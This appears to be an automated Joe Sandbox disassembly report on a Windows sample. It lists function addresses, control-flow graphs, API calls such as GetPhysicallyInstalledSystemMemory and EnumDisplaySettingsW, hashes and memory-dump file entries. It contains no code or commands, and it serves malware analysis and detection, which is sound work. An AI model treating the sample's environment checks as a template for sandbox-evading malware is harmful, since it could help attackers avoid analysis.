                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                                                • API String ID: 0-1108506012
                                                                                                                                                                                                                                                                • Opcode ID: ff90c677912a6e6577f7d3bc6fc46a99737b6dd79ff7aa1256f04990946db370
                                                                                                                                                                                                                                                                • Instruction ID: 1418b7ca767a3e55faba1f65c4f2f5314e50c81589235e581c78ac9d888150fe
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff90c677912a6e6577f7d3bc6fc46a99737b6dd79ff7aa1256f04990946db370
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AB1D47164C7808BE3148A28CD9439BBFD257C6314F1D4B6EE5E9473C2C6BD88C5874A
                                                                                                                                                                                                                                                                Function 003E8600 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 356COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1066 3e8600-3e8611 call 41d9a0 1069 3e8a48-3e8a4b ExitProcess 1066->1069 1070 3e8617-3e861e call 4162a0 1066->1070 1073 3e8624-3e864a 1070->1073 1074 3e8a31-3e8a38 1070->1074 1082 3e864c-3e864e 1073->1082 1083 3e8650-3e887f 1073->1083 1075 3e8a3a-3e8a40 call 3e7f60 1074->1075 1076 3e8a43 call 41e080 1074->1076 1075->1076 1076->1069 1082->1083 1085 3e8880-3e88ce 1083->1085 1085->1085 1086 3e88d0-3e891d call 41c540 1085->1086 1089 3e8920-3e8943 1086->1089 1090 3e8964-3e897c 1089->1090 1091 3e8945-3e8962 1089->1091 1093 3e8a0d-3e8a25 call 3e9d00 1090->1093 1094 3e8982-3e8a0b 1090->1094 1091->1089 1093->1074 1097 3e8a27 call 3ecb90 1093->1097 1094->1093 1099 3e8a2c call 3eb7b0 1097->1099 1099->1074
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 003E8A4B
                                                                                                                                                                                                                                                                  • Part of subcall function 003EB7B0: FreeLibrary.KERNEL32(003E8A31), ref: 003EB7B6
                                                                                                                                                                                                                                                                  • Part of subcall function 003EB7B0: FreeLibrary.KERNEL32 ref: 003EB7D7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                                                • String ID: b]u)$}$}
                                                                                                                                                                                                                                                                • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                                                • Opcode ID: fe2f4c5f335a8e207917384a9d92ca877ea62821908f5328317e3b8b10b13072
                                                                                                                                                                                                                                                                • Instruction ID: 6f2299d9f9de20ae78e0e96f205d8ce102c9d902480ddded458839db0714d2bc
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe2f4c5f335a8e207917384a9d92ca877ea62821908f5328317e3b8b10b13072
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50C1F873E187244BC718DF69C84125AF7D6ABC4710F0AC62EA898EB391EA74DC058BC5
                                                                                                                                                                                                                                                                Function 0040D34A Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 398COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1130 40d34a-40d362 1131 40d370-40d382 1130->1131 1131->1131 1132 40d384-40d389 1131->1132 1133 40d39b-40d3a7 1132->1133 1134 40d38b-40d38f 1132->1134 1136 40d3c1-40d40f call 41fe00 GetPhysicallyInstalledSystemMemory 1133->1136 1137 40d3a9-40d3ab 1133->1137 1135 40d390-40d399 1134->1135 1135->1133 1135->1135 1142 40d410-40d44d 1136->1142 1138 40d3b0-40d3bd 1137->1138 1138->1138 1140 40d3bf 1138->1140 1140->1136 1142->1142 1143 40d44f-40d498 call 3fe960 1142->1143 1146 40d4a0-40d551 1143->1146 1146->1146 1147 40d557-40d55c 1146->1147 1148 40d57d-40d583 1147->1148 1149 40d55e-40d568 1147->1149 1151 40d586-40d58e 1148->1151 1150 40d570-40d579 1149->1150 1150->1150 1152 40d57b 1150->1152 1153 40d590-40d591 1151->1153 1154 40d5ab-40d5b3 1151->1154 1152->1151 1155 40d5a0-40d5a9 1153->1155 1156 40d5b5-40d5b6 1154->1156 1157 40d5cb-40d611 1154->1157 1155->1154 1155->1155 1158 40d5c0-40d5c9 1156->1158 1159 40d620-40d653 1157->1159 1158->1157 1158->1158 1159->1159 1160 40d655-40d65a 1159->1160 1161 40d65c-40d65d 1160->1161 1162 40d66d 1160->1162 1163 40d660-40d669 1161->1163 1164 40d670-40d67a 1162->1164 1163->1163 1165 40d66b 1163->1165 1166 40d68b-40d73c 1164->1166 1167 40d67c-40d67f 1164->1167 1165->1164 1168 40d680-40d689 1167->1168 1168->1166 1168->1168
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0040D3EE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                                                • String ID: ><+
                                                                                                                                                                                                                                                                • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                                                • Opcode ID: 3b92007c4adc392753da40639593d58bc4e9b2c25419967f83fba1dae477fac9
                                                                                                                                                                                                                                                                • Instruction ID: 07d5bfee1b1bab18cbc968e93b639ce618b4134f5d04add063521036763c773f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b92007c4adc392753da40639593d58bc4e9b2c25419967f83fba1dae477fac9
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54C1D575A047418FD725CF2AC490762FBE2BF96310F1885AEC4DA9B792C739E806CB54
                                                                                                                                                                                                                                                                Function 0040D17D Relevance: 3.2, APIs: 2, Instructions: 152COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 1177 40d17d-40d1c5 call 3e7fd0 call 41fe00 EnumDisplaySettingsW call 3faeb0 1183 40d1ca-40d1fb 1177->1183 1184 40d200-40d21b 1183->1184 1184->1184 1185 40d21d-40d222 1184->1185 1186 40d224-40d225 1185->1186 1187 40d23b-40d243 1185->1187 1188 40d230-40d239 1186->1188 1189 40d245-40d249 1187->1189 1190 40d25d 1187->1190 1188->1187 1188->1188 1191 40d250-40d259 1189->1191 1192 40d260-40d287 call 3faeb0 1190->1192 1191->1191 1193 40d25b 1191->1193 1196 40d289-40d28f 1192->1196 1197 40d29d 1192->1197 1193->1192 1198 40d290-40d299 1196->1198 1199 40d2a0-40d2cf FreeLibrary 1197->1199 1198->1198 1201 40d29b 1198->1201 1202 40d2d0-40d2e2 1199->1202 1201->1199 1202->1202 1203 40d2e4-40d31a call 3e8f70 1202->1203
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 0040D1B3
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(1A11171A), ref: 0040D2A4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: DisplayEnumFreeLibrarySettings
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1449841772-0
                                                                                                                                                                                                                                                                • Opcode ID: 33add3d6d316ae96631ae755975a7852ba4fc0153c473f178247435b51ac5999
                                                                                                                                                                                                                                                                • Instruction ID: de72d44266cf2949b631b010904c0d7eb344119e6759f8300c4b48845c88bb36
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 33add3d6d316ae96631ae755975a7852ba4fc0153c473f178247435b51ac5999
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A41E1706043818BE3158B38C9A0B63BFE1EF57314F28869CE5DA5F393D639980A8B55
                                                                                                                                                                                                                                                                Function 00420D20 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: @Ukx$
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                                                • Opcode ID: 7770d2e7efcdffea95f03bb6da294060e501c5864ac5de6770c1f7fd922e52ac
                                                                                                                                                                                                                                                                • Instruction ID: 3657538467034911ebf0da031acb498006ea0579f34fe97e78aa8df8c4394f89
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7770d2e7efcdffea95f03bb6da294060e501c5864ac5de6770c1f7fd922e52ac
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E9B16632B083204BC728CE28ECD12BBB7D3EBD5314F59893DD98657396CA399C458786
                                                                                                                                                                                                                                                                Function 003EE687 Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID: 5DABC8580B7AE972BEBA0C6A975F1733
                                                                                                                                                                                                                                                                • API String ID: 0-2157045354
                                                                                                                                                                                                                                                                • Opcode ID: 363a0194c9f559d2999ef94d458b0d6219b6658f77b4b14ad2a27fd858ff2d75
                                                                                                                                                                                                                                                                • Instruction ID: 5e2407b02aa91971aa347d5ac627600344b68b5098b420faedc35226278623be
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 363a0194c9f559d2999ef94d458b0d6219b6658f77b4b14ad2a27fd858ff2d75
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00817D756407418BD325CB39CC927A7B7E2FF9A315F0DCA6CD4868B387E678A8028750
                                                                                                                                                                                                                                                                Function 0041E110 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LdrInitializeThunk.NTDLL(0042148A,00000002,00000018,?,?,00000018,?,?,?), ref: 0041E13E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                                                Function 00407440 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: _^]\
                                                                                                                                                                                                                                                                • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                                                • Opcode ID: 92257ca6012847125e0ada6d62c328d857c202bdbee1f18d55e63a9f9db457d8
                                                                                                                                                                                                                                                                • Instruction ID: 7d7f5d0cb539cd7b7760c297e12ca9a135aa8be3c67dffdc054a5cfe0befa648
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92257ca6012847125e0ada6d62c328d857c202bdbee1f18d55e63a9f9db457d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37712BB1E083005BD7249B29DC9277B76A1DF81314F18853DE986A73C2E23DEC06835B
                                                                                                                                                                                                                                                                Function 00421720 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1673122276.00000000003E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673104363.00000000003E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673122276.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673173269.0000000000433000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.000000000068C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006B4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673190188.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673435376.00000000006CB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673544502.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1673560468.000000000085B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_3e0000_hx0wBsOjkQ.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID: =<32
                                                                                                                                                                                                                                                                • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                                                • Opcode ID: cde7fe5e413febb926b67627a59d2e96dd3d090adfcae7440c3bce4cdb8d4326
                                                                                                                                                                                                                                                                • Instruction ID: 74c6d365781ec40f4ef800d090104f3d7b76d27af9b370a74f6a5ce85e3ccc98
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cde7fe5e413febb926b67627a59d2e96dd3d090adfcae7440c3bce4cdb8d4326
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 773168387043146BE724AE14ACD1B3BB396EBD4350F58852EE981573B0D739DC51878A
                                                                                                                                                                                                                                                                Function 00401A10 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
